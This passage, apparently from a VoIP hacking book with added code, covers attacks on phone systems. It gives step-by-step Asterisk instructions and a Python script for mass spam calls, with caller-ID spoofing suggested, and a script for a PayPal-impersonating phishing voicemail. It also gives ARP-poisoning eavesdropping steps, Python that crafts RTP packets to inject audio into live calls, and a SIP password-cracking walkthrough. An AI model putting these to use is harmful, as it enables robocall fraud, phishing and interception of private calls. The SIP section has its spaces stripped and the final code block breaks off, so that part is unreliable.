The ability to send pre-recorded calls over VoIP is quite easy. With VoIP infrastructure, standard messaging formats can be used. Open PBX systems, such as Asterisk, can be used to blast pre-recorded messages to individual phone numbers in mass quantity. Asterisk allows users to make a single call file and send it manually. The call file can then be repeatedly sent to several different phone numbers over a short period of time. Complete the following steps to send spam messages over VoIP infrastructure:

1. Record the spam message. This can be accomplished using a variety of methods; for this proof of concept, we will use a pre-recorded message in .mp3 format. Using any voice recorder, record the spam message and save it to a .mp3 file (e.g., SPAM.mp3).

2. After the file has been saved, load it into the following directory on your Asterisk server: /var/lib/asterisk/mohmp3/SPAM.mp3. If you don't have time to record a spam message, use any music .mp3 file for this example.

3. Create an extension sequence to call the target and play the .mp3 file when the phone is answered.
a. Edit /etc/asterisk/extensions.conf by adding the following lines under the test realm [test], which will create an extension and reference the SPAM.mp3 message recorded:

[test]
exten => s,1,Answer
exten => s,2,MP3Player(/var/lib/asterisk/mohmp3/SPAM.mp3)
exten => s,3,Hangup

4. To complete the proof of concept, we will be using the free account created earlier with VoIPBuster. Please complete that section of this chapter before proceeding to the next step. In summary, be sure to visit http://www.voipbuster.com/, create an account, and add the following information to your sip.conf file (where USERNAME and PASSWORD are the information you provided to VoIPBuster):

[voipbuster]
type=peer
host=sip.voipbuster.com
context=test
username=USERNAME
secret=PASSWORD

5. Create the call file itself. The call file will be used to manually send a pre-recorded message using Asterisk. (The file is created outside the outgoing directory and moved in later, rather than edited in place, because Asterisk acts on a call file as soon as it appears and could otherwise pick up a half-written one.)
a. Change directories to /var/spool/asterisk/tmp.
b. Open a text editor, such as vi, and create a call file called SPAM.Test.call. The first line will list the targeted phone number to send your spam to, which is indicated by the channel information. The channel information will use the VoIPBuster account created earlier. For example, the first line will be listed as SIP/1-xxx-xxx-xxxx@voipbuster, where xxx-xxx-xxxx should be replaced by the 10-digit phone number of the target (e.g., SIP/14151182006@voipbuster). If the targeted phone is 415.118.2006, the channel line will look like the following:

Channel: SIP/14151182006@voipbuster

c. Add the rest of the items below, which include the max retries, wait time, and priority, to make the call file work:

MaxRetries: 5
RetryTime: 300
WaitTime: 45
Context: test
Extension: s
Priority: 1

6. To test the call file and ensure that everything worked, restart the Asterisk server, which ensures that the updated extensions.conf file has been loaded:

/etc/init.d/asterisk restart

7. Move the newly created call file to Asterisk's outgoing folder. Asterisk checks this folder periodically to send outbound calls. Within a few moments of your moving the file, Asterisk will call 415.118.2006 and play the pre-recorded .mp3 message to the user when she answers the phone:

mv /var/spool/asterisk/tmp/SPAM.Test.call /var/spool/asterisk/outgoing

Done! You have now sent the SPAM.mp3 file to your targeted user.

If the call was made successfully, then the real nastiness can begin. As you may have noticed, there is nothing unique about the call file except the phone number listed on the first line. A simple script can be created that changes the 10-digit phone number of the target to any value the spammer wishes. Furthermore, the script can be written in a way that creates a unique call file for each number between 415.000.0000 and 415.999.9999. Once these call files have been moved to the outgoing folder and sent by Asterisk, it can send the pre-recorded SPAM.mp3 file to all the phone numbers in San Francisco (415 is the area code for San Francisco). Furthermore, the attacker could use his VoIPJet account instead of VoIPBuster and set the Caller ID value to something trusted, such as the local fire department number. This would make the calls appear to be originating from a trusted source, allowing the spammer to SPIT on all the phones in a major city.
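The script described above, as an added example that is not part of the book: it renders the same call file the steps build by hand, once per target number, and stages each file the way the steps do (write under the spool's tmp directory, then rename into outgoing), because Asterisk acts on a call file as soon as it appears in outgoing. The trunk name (voipbuster), context (test) and retry values are the ones used in the steps; the sample numbers and the temporary spool directory are constructed for the demo. Point spool_dir at /var/spool/asterisk on a real lab box.

```python
"""Generate and stage Asterisk call files for a list of target numbers.

Added example (not from the book). Numbers, spool directory and the
VOIPBUSTER trunk name below are assumptions for a lab setup.
"""
import os
import re
import tempfile

CALL_FILE_TEMPLATE = (
    "Channel: SIP/{number}@{trunk}\n"
    "MaxRetries: {max_retries}\n"
    "RetryTime: {retry_time}\n"
    "WaitTime: {wait_time}\n"
    "Context: {context}\n"
    "Extension: s\n"
    "Priority: 1\n"
)


def normalize_us_number(raw):
    """Reduce '(415) 118-2006' or '415.118.2006' to the 11-digit 1NXXNXXXXXX
    form the trunk expects; reject anything else so a typo does not dial a
    stranger (NANP area codes start with 2-9)."""
    digits = re.sub(r"\D", "", raw)
    if len(digits) == 10:
        digits = "1" + digits
    if len(digits) != 11 or digits[0] != "1" or digits[1] not in "23456789":
        raise ValueError("not a North American 10-digit number: %r" % raw)
    return digits


def render_call_file(number, trunk="voipbuster", context="test",
                     max_retries=5, retry_time=300, wait_time=45):
    """Return the text of one call file, identical in shape to the one in the text."""
    return CALL_FILE_TEMPLATE.format(number=normalize_us_number(number), trunk=trunk,
                                     context=context, max_retries=max_retries,
                                     retry_time=retry_time, wait_time=wait_time)


def stage_call_files(numbers, spool_dir, trunk="voipbuster", context="test"):
    """Write one call file per number under <spool_dir>/tmp, then rename it into
    <spool_dir>/outgoing. Returns the final paths in the order written."""
    tmp_dir = os.path.join(spool_dir, "tmp")
    outgoing = os.path.join(spool_dir, "outgoing")
    os.makedirs(tmp_dir, exist_ok=True)
    os.makedirs(outgoing, exist_ok=True)
    written = []
    for raw in numbers:
        number = normalize_us_number(raw)
        name = "SPAM.%s.call" % number
        tmp_path = os.path.join(tmp_dir, name)
        with open(tmp_path, "w") as fh:
            fh.write(render_call_file(number, trunk, context))
        final_path = os.path.join(outgoing, name)
        os.rename(tmp_path, final_path)   # atomic when tmp and outgoing share a filesystem
        written.append(final_path)
    return written


def demo():
    """Stage two constructed numbers into a throwaway spool directory and
    return {filename: contents} so the result can be inspected without Asterisk."""
    spool = tempfile.mkdtemp(prefix="asterisk-spool-")
    paths = stage_call_files(["(415) 118-2006", "415.118.2007"], spool)
    result = {}
    for path in paths:
        with open(path) as fh:
            result[os.path.basename(path)] = fh.read()
    return result


if __name__ == "__main__":
    for name, body in demo().items():
        print(name)
        print(body)
```

The validation step matters more than it looks: a script that turns an unchecked list into call files will happily dial whatever garbage is in the list, and once a file lands in outgoing there is no taking it back.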
Lightweight SPIT with Skype/Google Talk

Another way to SPIT on users is to use Skype, Google Talk, or the handful of other VoIP clients that support a voicemail feature. Skype and Google Talk offer a feature that allows a voicemail message to be sent to other Skype/Google Talk users. Similar to sending advertisement email to users, this feature can be abused by Skype/Google Talk users. The feature allows a voicemail to be sent to any contact in your contact list. Unlike bulk email, which allows a single email to be sent to several thousand users, Skype and Google Talk do not support bulk voicemail. An attacker would have to send a voicemail to each target one by one, thus limiting the feasibility of this type of SPIT activity, given that volume is a big factor when one is trying to advertise products to users via spam. Regardless, to SPIT on Skype/Google Talk users, a phisher can send a voicemail that sounds as if it is from a legitimate credit card company. In fact, with PayPal being a high-profile target of email phishers, and the fact that eBay owns both PayPal and Skype, a voicemail from "PayPal" to a Skype account citing unauthorized activity and requesting immediate action is probably the next wave of attacks. A sample Skype phish attempt may have the following speech: "Dear Customer: We have noticed unusual activity in your account and ask that you call 1.800.118.2006 immediately to resolve this issue. The activity in question seems to be abusing both your PayPal and eBay accounts at this time. Thank you, PayPal Trust and Safety."

Carry out the following steps to complete a proof of concept of SPIT with Skype:

1. Download Skype from http://www.skype.com/ or Google Talk from http://www.google.com/talk/.
2. Acquire Skype Voicemail, which can be purchased for US$6.00, or Google Talk Voicemail, which is free.
3. Open Notepad and copy the previous phishing text into a new file.
4. Open Windows Sound Recorder (Start ► Programs ► Accessories ► Sound Recorder).
5. Open Windows Narrator (Start ► Programs ► Accessibility ► Narrator).
6. Click Sound Recorder's Record button.
7. When Narrator begins to speak words, give the Notepad file the focus. This step records the phishing text into a computer voice, mimicking the automated calls made by credit card companies.
8. Click Sound Recorder's Stop button after Narrator finishes the phishing text. Save the file as SPIT.wav.
9. To use Skype and/or Google Talk to SPIT:
a. Right-click the user to whom you wish to send a SPIT voicemail.
b. Wait for the user's voicemail box to start recording.
c. Play the SPIT.wav file from your machine.

Done! You have just sent a spam voicemail using computer-automated text to a targeted VoIP user. As you may have noticed, the example shows an unsophisticated method of spamming VoIP users. As with every other section of this chapter, the proof of concept is meant to show how easily SPIT can be performed, not to provide the recipe for disaster. A real SPIT methodology would improve the previous example by using a better computer-automated voice (such as one produced by Festival, the text-to-speech engine Asterisk can drive) and sending bulk voicemails with a single audio file (using scripting or some other automated delivery method).

Summary

As you have no doubt noticed from this chapter, many unconventional attacks are possible with VoIP infrastructure. The descriptions of many of these attacks in this chapter have shown the most severe cases, which allow any user to download the Asterisk PBX system and within a few moments play games on trusted devices in our homes and offices (landlines and mobile phones, as well as VoIP phones). VoIP technology has a long way to go in terms of trust boundaries and security guarantees, because abuse of the system is not actively defended against or secured. History tells us that when abuse is allowed and can lead to financial gain, such as with email technologies, attackers will not hesitate to take advantage of the opportunity. Unfortunately for the rest of us, the trust of items we once felt very secure about can no longer be guaranteed, whether that is the Caller ID, an account representative from your credit card company, or simply a voicemail.
Chapter 8. HOME VOIP SOLUTIONS

Home VoIP solutions have been gaining popularity for many years. From early solutions like Net2Phone to the popularity of PC-based VoIP solutions like Skype and all the way to traditional phones using VoIP solutions like Vonage, home VoIP use is on the rise. While the Internet has allowed telephone calls over IP protocols for many years, not until about 2005 did we see a true foothold in the home market. Many aspects of VoIP solutions appeal to the home user, including the rising cost of traditional home phones, the growing disuse of landlines in favor of mobile phones, and the "geek" factor of being able to use the computer for everything, including making inexpensive telephone calls to friends and family.

While VoIP at home is a cheap, fun, and easy-to-use method for placing telephone calls, it comes with a few disadvantages. For example, if your home voice solution is PC-based, a power outage can leave you without a phone (because you can't connect to the services without electricity to power a computer). Furthermore, traditional 911 services may not be available with many PC-based VoIP clients, such as Skype, Yahoo!, and Google, because many VoIP solutions cannot provide a caller's physical address, which is a requirement for the use of 911 calls. Call quality can also be an issue at times. While some VoIP services have high quality, the technology is still pretty inconsistent. For example, Skype's call quality has improved, but the service still leaves much to be desired in terms of consistent quality on every call.

The final disadvantage, which is most pertinent to this chapter, is the relative lack of security. While landlines are not cheap, cool to use, or flexible, they provide a layer of intrinsic security and trust. Landline security is beyond the scope of this chapter, but no one can dispute that most users place a considerable amount of trust in landline calls being safe from the casual attacker. People probably expect the government to be able to tap their phone lines, but they do not expect that any 15-year-old on the Internet will be able to do so, which is where VoIP adds danger. By this point in the book, though, you should be well aware that security and trust are VoIP's primary liabilities, and the same problems apply to home VoIP solutions.

This chapter evaluates the security of home VoIP solutions, including commercial VoIP solutions, PC-based VoIP solutions, and small office/home office (SOHO) phone solutions. The following list describes the products covered in each category:

Commercial VoIP solutions: Vonage
PC-based VoIP solutions: Yahoo! Messenger, Google Talk, Microsoft Live Messenger, Skype
SOHO phone solutions: Products from companies like Linksys, Netgear, and D-Link

It should be noted that many of the protocols used by commercial, PC-based, and/or SOHO VoIP solutions have already been discussed in this book, specifically in the SIP and RTP chapters (Chapter 2 and Chapter 4, respectively). All attacks shown in the SIP and RTP chapters apply to each VoIP product that uses those protocols, regardless of whether it is Yahoo! Messenger or Vonage. While this chapter will not necessarily reiterate information provided in previous chapters, we'll be specifically discussing the security strengths and weaknesses of each home VoIP solution, and the familiar material will help to provide context.

Commercial VoIP Solutions

Commercial VoIP solutions have been growing rapidly over the past several years, with companies like Vonage providing customers with traditional phone services over the Internet. Unlike PC-to-PC calling or the hybrid solutions (PC/hard phone), Vonage does not require any software on a PC for the system to run. While Vonage users can make use of optional software, the system requires only a base station that connects to a home telephone jack and an Ethernet cable. In fact, home users can use their existing PSTN phones (public switched telephone network, which is a traditional landline) with the Vonage solution, requiring no hard VoIP device. While Vonage and other providers offer a lower package price for home phone services than traditional telephone companies, the security of the Vonage VoIP call must be considered. Even though traditional PSTN landlines do not necessarily secure a user's telephone call,[12] one still assumes a certain amount of trust when using a home phone. The security implications of Vonage are no different from those associated with previously described insecure protocols, such as SIP and RTP, but the attack process is slightly changed.
Vonage

According to Vonage's website, VoIP calls using the Vonage service are secure. In fact, the company states that a Vonage call is actually more secure than a call made via a traditional PSTN line.[13] The company goes on to state that an attacker cannot simply sniff the wire or redirect a conversation elsewhere. These are very bold security statements that require significant support, so let's see if they are true. A typical Vonage architecture setup is shown in Figure 8-1.

Figure 8-1. Vonage VoIP setup

Unfortunately, Vonage is not more secure than PSTN lines and is vulnerable to several VoIP security attacks. Specifically, every attack discussed in the SIP and RTP chapters can be applied to Vonage. It is quite surprising to see Vonage make such bold security promises with so little evidence to back them up. Both session setup via SIP and media transfer via RTP are wide open to attacks. In Vonage's defense, attacks from the Internet have a small attack surface. Figure 8-2 shows the three main attack surfaces of Vonage.

Figure 8-2. Attacking a Vonage VoIP network

In order to further define Vonage's attack surface, the following list describes the probability of each attack. Probability here is measured in terms of the likelihood that an attack would be successful in the given environment.

High probability: Internal attackers who have access to a user's home (e.g., spouse, child, parent, roommate, roommate's boyfriend or girlfriend)
Medium probability: Vonage systems connected to home wireless networks that are accessible to neighbors and wardrivers
Low probability: External attackers who are able to sniff the network in the correct segment

While internal attacker may be a strong term for a family member or roommate, most individuals make occasional calls that a spouse, child, parent, or roommate should not be listening to. Whether the call has to do with a surprise party for a relative, a secret that needs to be hidden from one's parents, or a roommate's ordering pizza and giving a credit card number, some things just require privacy.

The wireless attack surface is probably a bigger concern, because many people use wireless routers from Linksys, Netgear, and D-Link in their homes. While the convenience of wireless networking is great, the security protections on home wireless devices are terrible. Most home wireless networks are set up very poorly in terms of security. For example, some home users deploy wireless devices with no encryption, allowing attackers in the neighborhood to connect and see all traffic that is sent in cleartext. Some users enable Wired Equivalent Privacy (WEP) encryption on their wireless devices, but an attacker can crack WEP in about 30 minutes or less. A newer solution, Wi-Fi Protected Access (WPA), is being used more and more to replace WEP, but when WPA runs in pre-shared key mode with a weak passphrase, an offline dictionary attack against the captured handshake can be performed quite easily with tools like Cain & Abel. Either form of encryption can therefore still allow an external attacker, such as a neighbor or even any wardriver with a strong wireless antenna, to sniff the traffic and eavesdrop on a user's VoIP calls.

The final scenario is the one with the most difficult attack surface, but it should still be taken into consideration when addressing security. Because Vonage traffic is sent in cleartext, any malicious user on the DSL/cable segment can sniff the traffic and view the call information. An attacker in Russia who is targeting a user in California will have a tough time reaching the specific network segment; however, an attacker who uses the same broadband provider as another Vonage user could sniff the segment more easily. Limited access to the network segment definitely reduces the attack surface, but engaging in voice communication that traverses the network in cleartext is not a good policy. As an analogy, most Internet users would not purchase an item online unless encryption (SSL) were being performed by the web browser. Users are trained to look for the security lock on their web browser (or the presence of https instead of http in the browser's address bar) to assure them that any transaction or communication between them and Amazon, eBay, PayPal, or their bank's website is encrypted. However, a Vonage user who gives his credit card number over the phone to pay for a pizza has just sent all that credit card information over the Internet in cleartext, which is the equivalent of making a credit card payment in the web browser without the reassurance of SSL.

In order to show the security issues first-hand, the next section will show how an attacker would perform SIP and RTP attacks on a VoIP solution that uses Vonage. Many of these attacks have already been explained in the SIP and RTP chapters but will be customized here to apply specifically to a Vonage environment. Furthermore, only SIP/RTP demonstrations that attack a home user's network or equipment will be shown, as attacking any Vonage infrastructure is illegal. The following attacks can be initiated on any of the attack surfaces shown in Figure 8-2:

Call eavesdropping (RTP)
Voice injection (RTP)
Username/password retrieval (SIP)
Call Eavesdropping (RTP)

RTP is a cleartext protocol, which means it can be sniffed over the network like other cleartext protocols such as telnet, FTP, and HTTP. While sniffing RTP packets is as easy as sniffing telnet packets, getting useful information is not quite as simple. Voice conversations using RTP consist of a collection of audio packets, with each packet containing a certain part of the audio communication from one endpoint to the other. Capturing a single RTP packet will give the attacker only a single audio slice of a longer conversation. An easy way to solve this issue without adding more complexity is to use a tool like Cain & Abel or Wireshark. These tools, as well as others, can capture a sequence of RTP packets, reassemble them in the correct order, and save the RTP stream as an audio file (e.g., a .wav file) using the correct audio codec. In this way, any passive attacker can simply point, click, and eavesdrop on almost any VoIP communication.

Performing a man-in-the-middle attack helps ensure the success of VoIP eavesdropping, because it forces targets to send their packets through an attacker on the local subnet. For example, let's say two trusted parties, Sonia and Kusum, want to communicate via telephone. In order to communicate with Kusum, Sonia dials her phone number. When Kusum answers the phone, Sonia begins her communication with Kusum. During a man-in-the-middle attack, an attacker intercepts the connection between Sonia and Kusum and acts as a router for the connection. This forces the two endpoints to route through an unauthorized third party. Both Kusum and Sonia can still communicate; however, neither of them will be aware that an unauthorized third party is listening to every word of their conversation. The attack is like having a three-way phone call in which two of the three callers are unaware of the presence of the third party. Figure 8-3 shows a high-level example of a man-in-the-middle attack.

Figure 8-3. Man-in-the-middle attack

Note: For more information on man-in-the-middle attacks, refer to Chapter 4.

In order to capture Vonage RTP packets, reassemble them, and decode them to .wav files using the correct codec, all the while performing a man-in-the-middle attack, an attacker might use the very popular tool Cain & Abel. To carry out a man-in-the-middle attack according to Figure 8-3 with Cain & Abel, an attacker would perform the following steps:

1. Download Cain & Abel, written by Massimiliano Montoro, from http://www.oxid.it/cain.html/.
2. Install the program using its defaults. Install the WinPcap packet driver as well if one is not already installed.
3. Launch Cain & Abel (Start ► Programs ► Cain).
4. Click the green icon in the upper left-hand corner that looks like a network interface card. The attacker will want to check that her NIC has been identified and enabled correctly by Cain & Abel.
5. Select the Sniffer tab.
6. Click the + symbol on the toolbar. The MAC Address Scanner window will appear. This will enumerate all the MAC addresses on the local subnet.
7. Click OK. See Figure 8-4 for the results.

Figure 8-4. MAC Address Scanner results

8. Select the APR tab on the bottom of the tool to switch to the ARP Poison Routing interface.
9. Click the + symbol on the toolbar to show all the IP addresses and their MACs. See Figure 8-5.

Figure 8-5. IP addresses and their MACs

10. On the left-hand side of the dialog shown in Figure 8-5, choose the target for the man-in-the-middle attack. Most likely this will be the default gateway in the attacker's subnet, so all packets will go through her first before reaching the real gateway of the subnet.
11. Once the attacker has chosen her target, which is the gateway IP address 172.16.1.1 in our example, she selects the VoIP endpoints on the right side that she wants to intercept traffic from, such as the Vonage base station. If she does not know which IP address is the Vonage device, she simply selects all the IP addresses on the right-hand side. Figure 8-6 shows more detail.

Figure 8-6. Man-in-the-middle targets

12. Select the yellow-and-black icon (the second one from the left on the menu bar) to officially start the man-in-the-middle attack. The untrusted third party will start sending out ARP responses on the network subnet, which will tell 172.16.1.119 that the MAC address of 172.16.1.1 has been updated to 00-00-86-59-C8-94. (See Figure 8-7.)

Figure 8-7. Man-in-the-middle attack in process with ARP poisoning

At this point, all traffic on the local network is going to the untrusted third party first and then on its appropriate route. The attacker can then use Cain & Abel, which provides a VoIP sniffer, to capture RTP packets and reassemble them into .wav files that can be opened with Windows Media Player.

13. Once a Vonage user places a phone call, complete the following steps to view the captured audio information:
a. Select the Sniffer tab on the top row.
b. On the bottom row, select VoIP. If VoIP communication has occurred on the network using RTP media streams, Cain & Abel will automatically save the RTP packets, reassemble them, and write them out in .wav format. As shown in Figure 8-8, Cain & Abel has captured a few phone conversations over the network using a few simple steps.

Using a man-in-the-middle attack and Cain & Abel's default VoIP sniffer, an attacker can easily capture, decode, and record all the voice communication on a Vonage network.

Figure 8-8. Captured VoIP communication via RTP packets
Voice Injection (RTP)

RTP is the media layer used by Vonage. In addition to weaknesses that allow VoIP eavesdropping, RTP is also vulnerable to injection attacks. Injection attacks allow malicious entities to inject audio into existing VoIP telephone calls. For example, an attacker could inject an audio file that says "Sell at 118" between two stockbrokers discussing insider trading information. To inject audio between two VoIP endpoints, RTP packets that mirror the timestamp, sequence number, and SSRC of the real RTP packets must be used. In a given RTP session, the timestamp advances by the number of samples carried in each packet (160 for 20 ms of G.711 audio at 8 kHz), the sequence number increments by 1 with every packet, and the SSRC is a fixed value for the session. RFC 3550 calls for the initial sequence number and timestamp to be random, but many implementations start them at 0; either way, all three values are either predictable or static once the stream is running. Gathering the correct timestamp, sequence, and SSRC information is quite easy because all of it traverses the network in cleartext. An attacker can simply sniff the network, read the required information for his attack, and inject his new audio packets. Furthermore, because the information is not random, a tool has been written (described in this section) to automate the process and require little effort from the attacker. Figure 8-9 shows an example of the RTP injection process.

Figure 8-9. RTP injection

Notice that the attacker's SSRC number is the same as the target's, and its sequence number and timestamp are in sync with the legitimate session (increasing accordingly). This makes the endpoint assume that the attacker's packets are part of the real session. In order to inject audio into VoIP networks that use RTP, an attacker should use RTPInject, a tool that automates the actions needed to inject packets into an existing audio stream. It automatically makes the appropriate changes to the timestamp, sequence, and SSRC values on behalf of the user. The only requirement is the audio file to be injected; however, RTPInject comes with an example audio file by default (for proof-of-concept purposes). In order to inject audio into an existing VoIP call, an attacker would complete the following steps:

1. Download RTPInject, written by Zane Lackey and Alex Garbutt, from http://www.isecpartners.com/tools.html/. Follow the Readme.txt file for usage on a Windows machine. The Linux version of RTPInject depends on the following packages, which are pre-installed on most modern Linux systems, such as Ubuntu, Red Hat, and the BackTrack Live CD (you must always run it with root privileges):
Python 2.4 or higher
GTK 2.8 or higher
PyGTK 2.8 or higher

2. Install the pypcap library included with RTPInject by using the following commands (this step must be performed as root):

bash# tar zxvf pypcap-1.1.tar.gz
bash# cd pypcap-1.1
bash# make all
bash# make install

3. Install the dpkt library included with RTPInject by using the following commands:

bash# tar zxvf dpkt-1.6.tar.gz
bash# cd dpkt-1.6
bash# make install

4. Perform a man-in-the-middle attack on the network (if necessary) using dsniff (Linux) or Cain & Abel (Windows), as described earlier in this chapter, in order to capture all RTP streams in the local subnet.

5. Launch RTPInject using the following command:

bash# python rtpinject.py

Once RTPInject is loaded, it will show three fields in its primary screen: the Source field, the Destination field, and the Voice Codec field. See Figure 8-10. The Source field will be auto-populated as RTPInject sniffs RTP streams on the network.

6. When a new IP address appears in the Source field, click it; it will then show the destination VoIP phone and the voice codec being used in the stream.

Figure 8-10. RTPInject main window

7. Because RTPInject displays the voice codec in use, the attacker can create the audio file with the proper codec she wishes to inject. Using Windows Sound Recorder or SoX for Linux, create an audio file in the format shown by RTPInject, such as A-Law, u-Law, GSM, G.723, PCM, PCMA, and/or PCMU.
a. Open Windows Sound Recorder (Start ► Programs ► Accessories ► Entertainment ► Sound Recorder).
b. Click the Record button, record the audio file, and then click the Stop button.
c. Select File ► Save As.
d. Select Change. Under Format, select the codec that was displayed in RTPInject. See Figure 8-11. (Both Windows Sound Recorder and the Linux SoX audio utility provide the ability to transcode any source audio to another type.)

Figure 8-11. Windows Sound Recorder codec

e. Click OK and then select Save.

8. Once this audio file has been created using Windows Sound Recorder or SoX, click the folder button on RTPInject and navigate to the location of the file recorded in step 7 (depicted in Figure 8-12).

Figure 8-12. Select dialog

9. With the RTP stream and audio file selected, click the Inject button. RTPInject then injects the selected audio file into the destination host in the RTP stream, as shown in Figure 8-13.

Figure 8-13. Injecting audio with RTPInject
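The two RTP manipulations this chapter relies on, reassembling a captured stream (what Cain & Abel does before writing a .wav file in the eavesdropping section) and crafting packets that continue a live stream (what RTPInject does here), come down to reading and writing the 12-byte RTP header. The following is an added example, not code from the book, from Cain & Abel or from RTPInject. It works on raw RTP packets (the UDP payload) constructed inline, and assumes a G.711 (PCMU/PCMA) stream at 8 kHz, where one payload byte is one sample, so the timestamp advances by the payload length (160 per 20 ms packet). Sending the crafted packets on the wire (raw sockets, spoofed source) is left out; only the header logic is shown.

```python
"""RTP header parsing, stream reassembly and injection-packet crafting.

Added example (not the book's code). Assumes G.711 at 8 kHz: one payload
byte per sample. The captured stream and attacker audio are constructed.
"""
import struct

RTP_FIXED_HEADER = struct.Struct("!BBHII")   # V/P/X/CC, M/PT, seq, timestamp, SSRC


def parse_rtp(packet):
    """Return seq, timestamp, SSRC, payload type, marker and payload,
    skipping any CSRC entries, header extension and padding."""
    if len(packet) < RTP_FIXED_HEADER.size:
        raise ValueError("packet shorter than an RTP header")
    b0, b1, seq, ts, ssrc = RTP_FIXED_HEADER.unpack_from(packet)
    if b0 >> 6 != 2:
        raise ValueError("not RTP version 2")
    offset = RTP_FIXED_HEADER.size + 4 * (b0 & 0x0F)      # skip CSRC list
    if b0 & 0x10:                                          # X bit: header extension
        ext_words = struct.unpack_from("!H", packet, offset + 2)[0]
        offset += 4 + 4 * ext_words
    payload = packet[offset:]
    if b0 & 0x20 and payload:                              # P bit: last byte is pad length
        payload = payload[:-payload[-1]]
    return {"seq": seq, "ts": ts, "ssrc": ssrc, "pt": b1 & 0x7F,
            "marker": b1 >> 7, "payload": payload}


def build_rtp(seq, ts, ssrc, payload, pt=0, marker=0):
    """Build a minimal RTP v2 packet (no CSRCs, no extension, no padding)."""
    header = RTP_FIXED_HEADER.pack(0x80, (marker << 7) | (pt & 0x7F),
                                   seq & 0xFFFF, ts & 0xFFFFFFFF, ssrc & 0xFFFFFFFF)
    return header + payload


def reassemble(packets):
    """Order captured packets of one stream (the SSRC of the first packet) by
    sequence number and join the payloads. Handles out-of-order delivery,
    duplicates and the 16-bit sequence wrap from 65535 back to 0."""
    parsed = [parse_rtp(p) for p in packets]
    ssrc = parsed[0]["ssrc"]
    by_seq = {}
    for h in parsed:
        if h["ssrc"] == ssrc:
            by_seq.setdefault(h["seq"], h)                 # first copy wins
    seqs = list(by_seq)
    wrapped = max(seqs) - min(seqs) > 0x8000

    def order(s):
        return s + 0x10000 if wrapped and s < 0x8000 else s

    return b"".join(by_seq[s]["payload"] for s in sorted(seqs, key=order))


def craft_injection(last_packet, audio, bytes_per_packet=160):
    """Split `audio` into packets that continue the victim stream: same SSRC
    and payload type, sequence +1 and timestamp +samples for each packet. A
    receiver that sees these before the legitimate packets carrying the same
    sequence numbers plays them as part of the call."""
    ref = parse_rtp(last_packet)
    seq, ts, out = ref["seq"], ref["ts"], []
    for i in range(0, len(audio), bytes_per_packet):
        chunk = audio[i:i + bytes_per_packet]
        seq = (seq + 1) & 0xFFFF
        ts = (ts + len(chunk)) & 0xFFFFFFFF             # one byte == one sample (G.711)
        out.append(build_rtp(seq, ts, ref["ssrc"], chunk, pt=ref["pt"]))
    return out


def demo():
    """Constructed stream: four G.711 packets captured out of order, then
    400 bytes (50 ms) of attacker audio appended after the last one."""
    ssrc = 0xDEADBEEF
    captured = [build_rtp(100 + i, 8000 + 160 * i, ssrc, bytes([i]) * 160) for i in range(4)]
    audio = reassemble([captured[2], captured[0], captured[3], captured[1]])
    injected = craft_injection(captured[3], b"\xff" * 400)
    return audio, [parse_rtp(p) for p in injected]


if __name__ == "__main__":
    audio, injected = demo()
    print(len(audio), "bytes reassembled;", [(h["seq"], h["ts"]) for h in injected])
```

The race in the last docstring is the whole attack: the receiver does not authenticate the source, so whichever packet with the next sequence number arrives first wins, which is why being on-path (the man-in-the-middle step) makes injection reliable rather than hit-or-miss. SRTP closes this by authenticating each packet, including its header.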
Username/PasswordRetrieval(SIP)
VonageusesSIPforsessionsetup.InorderforausertoplaceaphonecallonVonage,hisbasestationmustauthenticateappropriately.AsnotedinChapter2,SIPusesdigestauthentication,whichisvulnerabletoabasicofflinedictionaryattack.Inordertoperformanofflinedictionaryattack,theattackerneedstosnifftheusername,realm,Method,URI,nonce,andtheMD5responsehashoverthenetwork,allofwhichisavailabletoheroverthenetworkincleartext.Oncethisinformationhasbeenobtained,theattackertakesadictionarylistofpasswordsandinsertseachoneintothepreviousequations,alongwithalltheothercaptureditems.Oncethishasbeendone,theattackerwillhavealltheinformationsheneedstoperformtheofflinedictionaryattackwithease.Theinformationtoperformanofflinedictionaryattackisavailabletoapassiveattackerfromtwopackets:thechallengepacketfromtheSIPserverandtheresponsepacketbythe
UserAgent.ThepacketfromtheSIPserverwillcontainthechallengeandrealmincleartext,whilethepacketfromtheUserAgentwillcontaintheusername,method,andURIincleartext.Atthispoint,anattackercanthentakeapasswordfromherdictionary,concatenateitwiththeusernameandrealmvalues,andcreatethefirstMD5hashvalue.Next,theattackercantaketheMethodandURIsniffedoverthenetworkinordertocreatethesecondMD5hashvalue.Oncethetwohasheshavebeengenerated,theattackerwillthenconcatenatethefirstMD5,thenoncesniffedoverthenetwork,andthesecondMD5hashvalueandcreatethefinalResponseMD5value.IfthisresultingMD5hashvaluematchestheResponseMD5hashvaluesniffedoverthenetwork,thentheattackerknowsthatshehasbrute-forcedthecorrectpassword.IftheMD5hashvaluesdonotmatch,thentheattackermustrepeattheprocesswithanewpassworduntilshereceivesahashvaluethatmatchestheonethatwascapturedoverthenetwork.Unlikeanonlinebrute-forceattack,wheretheattackermayhaveonlythreeattemptsbeforealockout,theattackercanperformtheofflinetestforanindefinitenumberoftimesuntilshehascrackedthepassword.Foradeeperunderstandingoftheauthentication,refertoChapter2.Inordertoacquireauser'sVonageSIPpasswordusingCain&AbelandSIP.Tastic,anattackerwouldperformthefollowingsteps:
1. Repeat steps 1 through 13 from "Call Eavesdropping (RTP)".
2. Once a Vonage user places a phone call, complete the following steps to find and sniff the required information in order to brute-force the password:
   a. Select the Sniffer tab on the top row.
   b. Select the Passwords tab on the bottom row.
   c. Highlight SIP on the left pane, as shown in Figure 8-14.
Figure 8-14. Captured SIP information
3. Now that the required SIP authentication information has been captured over the network, download SIP.Tastic (SIP.Tastic.exe) from http://www.isecpartners.com/tools.html/.
4. Launch SIP.Tastic from the Start menu (Start ► Programs ► iSEC Partners ► SIP.Tastic ► SIP.Tastic).
5. Enter into the tool the SIP information that has been sniffed from Cain & Abel in Figure 8-14:
   Dictionary file: isec.dict.txt
   Username: 16505871532
   Realm: 69.59.242.86
   Method: REGISTER
   URI: sip:f:voncp.com:10000
   Nonce: 230948039
   MD5 Response Hash Value: b56ce72431cdff8d6e6539afecac522c
If the password is listed in the dictionary file, the tool will show the revealed password within a few minutes, as shown in Figure 8-15.
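The digest computation that the walkthrough above describes in words, as an added Go example that is not the book's code and not SIP.Tastic: it implements the RFC 2617 calculation a SIP User Agent performs (HA1, HA2, then the response), the matching check a registrar performs, and a parser for the Authorization header fields that a passive observer can read from the REGISTER packet. The account name, realm, nonce, URI and password are constructed sample values, not the capture in Figure 8-14. The password is the only input that never crosses the wire, which is why a captured digest can be tested offline and why Chapter 9 recommends SIPS for the signaling path.

```go
package main

import (
	"crypto/md5"
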